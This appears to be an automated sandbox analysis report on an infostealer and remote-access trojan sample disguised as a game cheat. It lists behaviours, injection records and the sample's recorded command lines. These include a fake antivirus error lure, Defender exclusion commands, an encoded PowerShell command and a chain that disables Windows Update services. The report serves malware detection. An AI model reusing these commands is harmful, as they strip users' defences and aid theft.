Malware Analysis Report

2024-11-13 18:04

Sample ID 241106-m7mcbsygmd
Target 1db3a38e9cff8b2aec7b73668e6768002c2bddbf
SHA256 ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c
Tags
redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan dcrat
score
10/10

Analysis Overview

score
10/10

SHA256

ac1eeee1f7d6e49d7dbc8b82f31844664089ddac969ab92fb8c3a98272ef7a5c

Threat Level: Known bad

The file 1db3a38e9cff8b2aec7b73668e6768002c2bddbf was found to be: Known bad.

Malicious Activity Summary

redline sectoprat lucifer defense_evasion discovery evasion execution exploit infostealer persistence rat trojan dcrat

Redline family

SectopRAT payload

Sectoprat family

Disables service(s)

RedLine

SectopRAT

RedLine payload

Dcrat family

DcRat

Suspicious use of NtCreateUserProcessOtherParentProcess

Drops file in Drivers directory

Stops running service(s)

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Executes dropped EXE

Loads dropped DLL

Modifies file permissions

Checks computer location settings

Power Settings

Obfuscated Files or Information: Command Obfuscation

Drops file in System32 directory

Suspicious use of SetThreadContext

Launches sc.exe

Drops file in Windows directory

Unsigned PE

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of SetWindowsHookEx

Uses Task Scheduler COM API

Modifies registry class

Scheduled Task/Job: Scheduled Task

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Suspicious use of UnmapMainImage

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-06 11:06

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-06 11:06

Reported

2024-11-06 11:09

Platform

win7-20240903-en

Max time kernel

149s

Max time network

141s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"

Signatures

Disables service(s)

evasion execution

RedLine

infostealer redline

RedLine payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Redline family

redline

SectopRAT

trojan rat sectoprat

SectopRAT payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Sectoprat family

sectoprat

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Windows\System32\conhost.exe N/A

Stops running service(s)

evasion execution

Obfuscated Files or Information: Command Obfuscation

defense_evasion

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2608 set thread context of 2556 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 2868 set thread context of 784 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 1632 set thread context of 1780 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe
PID 2116 set thread context of 2232 N/A C:\Windows\System32\conhost.exe C:\Windows\System32\conhost.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\dialersvc32.job C:\Windows\System32\conhost.exe N/A
File created C:\Windows\Tasks\dialersvc64.job C:\Windows\System32\conhost.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A
N/A N/A C:\Windows\system32\sc.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\windowshost.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WScript.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\explorer.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\driverPerf\cominto.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\system32\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2548 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2552 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2076 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2052 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2280 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2380 wrote to memory of 2300 N/A C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe C:\Windows\SysWOW64\cmd.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2548 wrote to memory of 1580 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 2344 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2076 wrote to memory of 2260 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2052 wrote to memory of 2816 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\svchost.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2280 wrote to memory of 2852 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\explorer.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2300 wrote to memory of 2772 N/A C:\Windows\SysWOW64\cmd.exe C:\Users\Admin\AppData\Local\Temp\windowshost.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2772 wrote to memory of 2888 N/A C:\Users\Admin\AppData\Local\Temp\windowshost.exe C:\Windows\SysWOW64\WScript.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2552 wrote to memory of 288 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 2888 wrote to memory of 1600 N/A C:\Windows\SysWOW64\WScript.exe C:\Windows\SysWOW64\cmd.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe
PID 1600 wrote to memory of 1804 N/A C:\Windows\SysWOW64\cmd.exe C:\driverPerf\cominto.exe

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe

"C:\Users\Admin\AppData\Local\Temp\1db3a38e9cff8b2aec7b73668e6768002c2bddbf.exe"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Windows\SysWOW64\cmd.exe

cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Windows\SysWOW64\cmd.exe

cmd /c start C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-Type -AssemblyName System.Windows.Forms;[System.Windows.Forms.MessageBox]::Show('Error #103 Cheat cannot start properly because antivirus is not disabled. Please disable antivirus and re-download the cheat.','Error','OK','Error')"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\svchost.exe

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\explorer.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Users\Admin\AppData\Local\Temp\windowshost.exe

C:\Windows\SysWOW64\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\driverPerf\DDCzSbk7D28EdFKaphOM.vbe"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"

C:\Windows\SysWOW64\cmd.exe

cmd /c ""C:\driverPerf\lG0LQTEIJKvWsYHAg5CgQ5boB.bat" "

C:\driverPerf\cominto.exe

"C:\driverPerf\cominto.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\conhost.exe

"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\svchost.exe"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -EncodedCommand "PAAjAGUAcwAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHkAcAB5ACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHoAbwB1AHEAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAbABxACMAPgA="

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" cmd /c sc stop wuauserv & sc stop bits & sc stop dosvc & sc stop UsoSvc & sc stop WaaSMedicSvc & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & sc config bits start= disabled & sc failure bits reset= 0 actions= "" & sc config dosvc start= disabled & sc failure dosvc reset= 0 actions= "" & sc config UsoSvc start= disabled & sc failure UsoSvc reset= 0 actions= "" & sc config wuauserv start= disabled & sc failure wuauserv reset= 0 actions= "" & takeown /f C:\\Windows\\System32\\WaaSMedicSvc.dll & icacls C:\\Windows\\System32\\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename C:\\Windows\\System32\\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v Start /t REG_DWORD /d 4 /f & reg add "HKLM\\SYSTEM\\CurrentControlSet\\Services\\WaaSMedicSvc" /v FailureActions /t REG_BINARY /d 000000000000000000000000030000001400000000000000c0d4010000000000e09304000000000000000000 /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows\\WindowsUpdate\\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\\Microsoft\\Windows\\WindowsUpdate\\Scheduled 